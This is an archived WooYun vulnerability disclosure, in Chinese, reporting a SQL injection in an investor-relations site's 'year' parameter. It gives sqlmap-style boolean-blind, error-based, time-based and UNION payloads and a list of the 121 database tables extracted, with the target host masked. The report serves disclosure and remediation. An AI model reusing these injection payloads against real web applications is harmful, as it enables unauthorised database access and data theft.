乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-30: 细节已通知厂商并且等待厂商处理中 2015-12-31: 厂商已经确认,细节仅向厂商公开 2016-01-10: 细节向核心白帽子及相关领域专家公开 2016-01-20: 细节向普通白帽子公开 2016-01-30: 细节向实习白帽子公开 2016-02-12: 细节向公众公开
---Parameter: #1* (URI) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: http://**.**.**.**:80/investor/index.php?route=investor/category/monthly_return&year=(select(0)from(select(sleep(0)))v)/-8348' OR 8212=8212#'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"/ Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: http://**.**.**.**:80/investor/index.php?route=investor/category/monthly_return&year=(select(0)from(select(sleep(0)))v)/-5754' OR 1 GROUP BY CONCAT(0x7162626b71,(SELECT (CASE WHEN (7647=7647) THEN 1 ELSE 0 END)),0x7170766a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"/ Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment) Payload: http://**.**.**.**:80/investor/index.php?route=investor/category/monthly_return&year=(select(0)from(select(sleep(0)))v)/' AND (SELECT *FROM (SELECT(SLEEP(5)))noeW)#'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"/ Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: http://**.**.**.**:80/investor/index.php?route=investor/category/monthly_return&year=(select(0)from(select(sleep(0)))v)/' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162626b71,0x535858726e73645254444f6e7742566e44674166506457707447636351416d794144694452456f41,0x7170766a71),NULL,NULL,NULL,NULL,NULL,NULL#'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"/---
Database: newcorporate[121 tables]+--------------------------------+| nm_address || nm_affiliate || nm_affiliate_transaction || nm_announcement || nm_announcement_description || nm_announcement_to_layout || nm_announcement_to_store || nm_annual_report || nm_annual_report_description || nm_annual_report_to_layout || nm_annual_report_to_store || nm_attribute || nm_attribute_description || nm_attribute_group || nm_attribute_group_description || nm_banner || nm_banner_image || nm_banner_image_description || nm_category || nm_category_description || nm_category_to_layout || nm_category_to_store || nm_circular || nm_circular_description || nm_circular_to_layout || nm_circular_to_store || nm_country || nm_coupon || nm_coupon_history || nm_coupon_product || nm_currency || nm_customer || nm_customer_group || nm_customer_group_description || nm_customer_ip || nm_customer_ip_blacklist || nm_customer_online || nm_customer_reward || nm_customer_transaction || nm_disclosure || nm_disclosure_description || nm_disclosure_to_layout || nm_disclosure_to_store || nm_download || nm_download_description || nm_extension || nm_geo_zone || nm_information || nm_information_description || nm_information_to_layout || nm_information_to_store || nm_language || nm_layout || nm_layout_route || nm_length_class || nm_length_class_description || nm_manufacturer || nm_manufacturer_to_store || nm_monthly_return || nm_monthly_return_description || nm_monthly_return_to_layout || nm_monthly_return_to_store || nm_option || nm_option_description || nm_option_value || nm_option_value_description || nm_order || nm_order_download || nm_order_fraud || nm_order_history || nm_order_option || nm_order_product || nm_order_status || nm_order_total || nm_order_voucher || nm_others || nm_others_description || nm_others_to_layout || nm_others_to_store || nm_press_release || nm_press_release_description || nm_press_release_to_layout || nm_press_release_to_store || nm_product || nm_product_attribute || nm_product_description || nm_product_discount || nm_product_image || nm_product_option || nm_product_option_value || nm_product_related || nm_product_reward || nm_product_special || nm_product_to_category || nm_product_to_download || nm_product_to_layout || nm_product_to_store || nm_return || nm_return_action || nm_return_history || nm_return_reason || nm_return_status || nm_review || nm_setting || nm_stock_status || nm_store || nm_tax_class || nm_tax_rate || nm_tax_rate_to_customer_group || nm_tax_rule || nm_url_alias || nm_user || nm_user_group || nm_voucher || nm_voucher_history || nm_voucher_theme || nm_voucher_theme_description || nm_weight_class || nm_weight_class_description || nm_zone || nm_zone_to_geo_zone |+--------------------------------+
屏蔽特殊字符
危害等级:高
漏洞Rank:10
确认时间:2015-12-31 15:33
已將事件通知有關機構
暂无